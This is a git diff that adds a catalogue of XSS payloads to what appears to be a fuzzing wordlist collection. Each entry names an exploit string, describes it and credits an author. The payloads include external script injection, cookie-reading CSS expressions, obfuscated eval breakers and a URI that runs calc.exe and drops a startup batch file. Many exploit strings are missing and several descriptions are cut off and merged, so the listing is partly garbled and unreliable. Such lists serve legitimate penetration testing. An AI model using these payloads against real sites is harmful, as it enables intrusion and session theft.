+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Fuzzing/advanced_xss_jhaddix.txt b/Fuzzing/JHADDIX_XSS.txt
similarity index 100%
rename from Fuzzing/advanced_xss_jhaddix.txt
rename to Fuzzing/JHADDIX_XSS.txt
diff --git a/Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt b/Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt
new file mode 100644
index 0000000..cbe54fd
--- /dev/null
+++ b/Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt
@@ -0,0 +1,1617 @@
+A very short cross browser header injection
+Exploit Name: A very short cross browser header injection
+Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws'
+Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area.
+Exploit Tags: xss, short, header, injection
+Author Name: .mario
+
+Add onclick event hadler
+Exploit Name: Add onclick event hadler
+Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
+Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert.
+Exploit Tags: general, JS breaking, basic, obfuscated, user interaction
+Author Name: kishor
+
+Advanced HTML injection locator
+Exploit Name: Advanced HTML injection locator
+Exploit String: 000%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
+Exploit Description: This vector indicates HTML injections by stroked text.
+Exploit Tags: general, html breaking, injection
+Author Name: .mario
+
+Advanced XSS Locator
+Exploit Name: Advanced XSS Locator
+Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");}alert(6);function xss(){//
+Exploit Description: Advanced XSS Locator
+Exploit Tags: general, html breaking, comment breaking, JS breaking
+Author Name: .mario
+
+Advanced XSS Locator for title-Injections
+Exploit Name: Advanced XSS Locator for title-Injections
+Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");}
+Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections.
+Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking
+Author Name: .mario
+
+aim: uri exploit
+Exploit Name: aim: uri exploit
+Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
+Exploit Description: This aim-uri executes the calc.exe on vulnerable systems
+Exploit Tags: URI exploits, gecko, injection, general
+Author Name: xs-sniper
+
+Backslash-obfuscated XBL injection - variant 1
+Exploit Name: Backslash-obfuscated XBL injection - variant 1
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 2
+Exploit Name: Backslash-obfuscated XBL injection - variant 2
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 3
+Exploit Name: Backslash-obfuscated XBL injection - variant 3
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 4
+Exploit Name: Backslash-obfuscated XBL injection - variant 4
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 5
+Exploit Name: Backslash-obfuscated XBL injection - variant 5
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+BASE
+Exploit Name: BASE
+Exploit String:
+Exploit Description: Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like ”images/image.jpg” rather than full paths. If the path includes a leading forward slash like ”/images/image.jpg” you can remove one slash from this vector (as long as there are two to begin the comment this will work
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+Basic back ticked attribute breaker
+Exploit Name: Basic back ticked attribute breaker
+Exploit String: `>
+Exploit Description: This vector breaks back ticked attributes.
+Exploit Tags: general, html breaking, basic
+Author Name: kishor
+
+Basic double quoted attribute breaker
+Exploit Name: Basic double quoted attribute breaker
+Exploit String: >
+Exploit Description: This vector breaks double quoted attributes and produces an alert.
+Exploit Tags: general, html breaking
+Author Name: kishor
+
+Basic JS breaker
+Exploit Name: Basic JS breaker
+Exploit String: xyz onerror=alert(6);
+Exploit Description: This vector just fits between script tags and fires an alerts.
+Exploit Tags: general, JS breaking, basic
+Author Name: kishor
+
+Basic JS breaker variant 1
+Exploit Name: Basic JS breaker variant 1
+Exploit String: 1;a=eval;b=alert;a(b(/c/.source));
+Exploit Description: This vector breaks JS integer assignments.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 2
+Exploit Name: Basic JS breaker variant 2
+Exploit String: 1];a=eval;b=alert;a(b(17));//
+Exploit Description: This vector breaks JS integer assignments in arrays.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 3
+Exploit Name: Basic JS breaker variant 3
+Exploit String: ];a=eval;b=alert;a(b(16));//
+Exploit Description: This vector breaks JS when placed in double quoted arrays.
+Exploit Tags: general, JS breaking
+Author Name: kishor
+
+Basic JS breaker variant 4
+Exploit Name: Basic JS breaker variant 4
+Exploit String: '];a=eval;b=alert;a(b(15));//
+Exploit Description: This vector breaks JS when embedded in single quoted arrays.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 5
+Exploit Name: Basic JS breaker variant 5
+Exploit String: 1};a=eval;b=alert;a(b(14));//
+Exploit Description: JS literal object breaker for integer properties.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 6
+Exploit Name: Basic JS breaker variant 6
+Exploit String: '};a=eval;b=alert;a(b(13));//
+Exploit Description: JS breaker for literal objects with single quoted string properties.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 7
+Exploit Name: Basic JS breaker variant 7
+Exploit String: };a=eval;b=alert;a(b(12));//
+Exploit Description: JS breaker for literal objects with double quoted string properties.
+Exploit Tags: general, JS breaking
+Author Name: kishor
+
+Basic JS breaker variant 8
+Exploit Name: Basic JS breaker variant 8
+Exploit String: a=1;a=eval;b=alert;a(b(11));//
+Exploit Description: Can be used when JS can be injected directly.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 9
+Exploit Name: Basic JS breaker variant 9
+Exploit String: ;//%0da=eval;b=alert;a(b(10));//
+Exploit Description: Breaks double quoted strings, injects a comment, carriage return and finally an alert.
+Exploit Tags: general, JS breaking, CRLF
+Author Name: kishor
+
+Basic JS breaker variant 10
+Exploit Name: Basic JS breaker variant 10
+Exploit String: ';//%0da=eval;b=alert;a(b(9));//
+Exploit Description: Breaks single quoted strings, injects a comment, carriage return and finally an alert.
+Exploit Tags: general, JS breaking, basic, obfuscated, CRLF
+Author Name: kishor
+
+Basic single quoted attribute breaker
+Exploit Name: Basic single quoted attribute breaker
+Exploit String: '>
+Exploit Description: This vector breaks single quoted attributes and appends an alert.
+Exploit Tags: general, html breaking, basic
+Author Name: kishor
+
+Basic title breaker
+Exploit Name: Basic title breaker
+Exploit String:
+Exploit Description: This basic vector breaks HTML titles and injects JavaScript.
+Exploit Tags: general, html breaking, basic, title breaking
+Author Name: kishor
+
+BGSOUND
+Exploit Name: BGSOUND
+Exploit String:
+Exploit Description: BGSOUND
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+BODY background-image
+Exploit Name: BODY background-image
+Exploit String:
+Exploit Description: BODY image
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+BODY ONLOAD
+Exploit Name: BODY ONLOAD
+Exploit String:
+Exploit Description: BODY tag (I like this method because it doesn't require using any variants of ”javascript:” or ”
+
+Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code.
+Exploit Tags: general, gecko, obfuscated, evil tags
+Author Name: t3rmin4t0r
+
+Commented-out Block
+Exploit Name: Commented-out Block
+Exploit String:
+Exploit Description: Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.
+Exploit Tags: general, obfuscated, conditional comments, internet explorer
+Author Name: ha.ckers.org
+
+Comment-breaker using obfuscated JavaScript
+Exploit Name: Comment-breaker using obfuscated JavaScript
+Exploit String: */a=eval;b=alert;a(b(/e/.source));/*
+Exploit Description: This vector creates an alert by breaking multiline comments.
+Exploit Tags: general, comment breaking, JS breaking
+Author Name: kishor
+
+Conditional style injection for IE
+Exploit Name: Conditional style injection for IE
+Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
+Exploit Description: This vector uses JavaScript conditional statements to inject an alert into CSS properties - it was once used as a PoC for a vulnerability in Stefan Di Paolos data binding example.
+Exploit Tags: general, obfuscated, internet explorer, style injection
+Author Name: DoctorDan
+
+Content Replace
+Exploit Name: Content Replace
+Exploit String: XSS
+Exploit Description: Content replace as an attack vector (assuming ”http://www.google.com/” is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (”java	script:” was converted into ”java script:”.
+Exploit Tags: general, evil tags, obfuscated
+Author Name: ha.ckers.org
+
+Cookie Manipulation
+Exploit Name: Cookie Manipulation
+Exploit String:
+Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where
+Exploit Description: Div background-image
+Exploit Tags: general, evil tags, style injection
+Author Name: ha.ckers.org
+
+DIV background-image 2
+Exploit Name: DIV background-image 2
+Exploit String:
+Exploit Description: Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)
+Exploit Tags: general, evil tags, style injection
+Author Name: ha.ckers.org
+
+DIV expression
+Exploit Name: DIV expression
+Exploit String:
+Exploit Description: Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ”expression”
+Exploit Tags: general, evil tags, style injection, internet explorer
+Author Name: ha.ckers.org
+
+DIV w/Unicode
+Exploit Name: DIV w/Unicode
+Exploit String:
+Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.
+Exploit Tags: general, evil tags, obfuscated
+Author Name: ha.ckers.org
+
+Double open angle brackets
+Exploit Name: Double open angle brackets
+Exploit String: